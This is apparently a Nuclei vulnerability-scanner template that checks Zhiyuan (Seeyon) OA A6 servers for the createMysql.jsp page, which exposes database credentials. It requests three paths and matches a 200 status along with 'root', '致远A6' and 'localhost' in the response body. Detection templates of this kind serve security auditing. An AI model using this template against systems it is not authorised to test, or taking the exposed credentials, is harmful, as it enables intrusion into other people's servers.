id: zhiyuan-A6-leakage

info:
  name: 致远OA A6 createMysql.jsp 数据库敏感信息泄露
  author: str1am
  severity: high
  tags: zhiyuan

requests:
  - method: GET
    path:
      - "{{BaseURL}}/yyoa/index.jsp"
      - "{{BaseURL}}/yyoa/createMysql.jsp"
      - "{{BaseURL}}/yyoa/ext/createMysql.jsp"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "root"
          - "致远A6"
          - "localhost"
        part: body
        condition: and
